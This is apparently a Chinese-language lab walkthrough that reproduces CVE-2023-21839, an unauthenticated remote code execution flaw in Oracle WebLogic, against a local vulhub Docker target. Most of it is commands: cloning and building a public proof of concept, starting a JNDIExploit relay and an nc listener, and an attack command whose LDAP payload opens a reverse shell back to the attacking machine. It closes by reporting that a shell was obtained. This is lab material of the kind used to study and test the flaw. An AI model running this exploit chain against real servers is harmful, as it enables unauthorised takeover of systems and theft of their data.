Weblogic未授权远程代码执行漏洞 (CVE-2023-21839)
Oracle WebLogic Server 12.2.1.3.0, 12.2.1.4.0 和 14.1.1.0.0存在安全漏洞,攻击者可利用该漏洞导致对关键数据的未授权访问或对所有 Oracle WebLogic Server 可访问数据的完全访问。
漏洞复现:
靶机ubuntu:192.168.126.128
攻击机kali:192.168.126.130
cd vulhub-master/
cd weblogic/
cd CVE-2023-21839/
docker-compose build #重新编译靶场环境 docker-compose up -d #开启靶场 docker-compose down #关闭靶场
启动成功后访问http://your-ip:7001/console
可以看到管理界面
账号密码可通过docker-compose logs | grep password
查看
攻击环境搭建
打开攻击机kali:192.168.126.130
下载poc:git clone https://github.com/4ra1n/CVE-2023-21839
没有安装go,先安装go:sudo apt install gccgo-go
安装后进行编译go build -o CVE-2023-21839
编译后:
中转工具
JNDIExploit下载:
https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4
1.开启JNDIExpolit监听:java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.126.130
2.开启nc监听: nc -lvvp 1234
3.攻击payload:
./CVE-2023-21839 -ip 192.168.126.128 -port 7001 -ldap ldap://192.168.126.130:1389/Basic/ReverseShell/192.168.126.130/1234
发起攻击
nc成功获得shell
成功创建hacker文件